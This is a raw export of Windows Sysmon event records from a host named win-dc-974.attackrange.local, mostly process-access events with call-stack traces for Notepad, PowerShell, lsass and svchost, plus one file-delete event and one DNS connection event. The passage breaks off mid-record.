|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.098{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 23542300x80000000000000001695672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.067{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9006C288CDD6E843FD7069172F8B89C,SHA256=2EBCAA0A8D5093323609EAD414E5562C3040A50277E83FE0AE88BA9DF63F3754,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.051{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.033{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.033{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.033{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.033{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001695666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.033{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.033{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018FEF55)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001695664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.033{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13c997|C:\Windows\System32\SHELL32.dll+13be18|C:\Windows\System32\SHELL32.dll+13ba1b|C:\Windows\System32\SHELL32.dll+13bb87|C:\Windows\System32\SHELL32.dll+13bb0a|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001695663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.033{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13c997|C:\Windows\System32\SHELL32.dll+13be18|C:\Windows\System32\SHELL32.dll+13ba1b|C:\Windows\System32\SHELL32.dll+13bb87|C:\Windows\System32\SHELL32.dll+13bb0a|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001695662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.033{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13c997|C:\Windows\System32\SHELL32.dll+13be18 10341000x80000000000000001695661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.033{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13c997|C:\Windows\System32\SHELL32.dll+13be18|C:\Windows\System32\SHELL32.dll+13ba1b 10341000x80000000000000001695660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.031{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000001695659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.031{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000001695658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.031{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001695657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:36.031{05ADC7E1-706F-603D-5688-00000000AD01}59568392C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+eca73|C:\Windows\System32\SHELL32.dll+ece74|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40 354300x80000000000000001695656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:27.219{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55113- 10341000x80000000000000001695752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.786{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-7071-603D-5888-00000000AD01}8860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.786{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-7071-603D-5888-00000000AD01}8860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.739{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-7071-603D-5888-00000000AD01}8860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 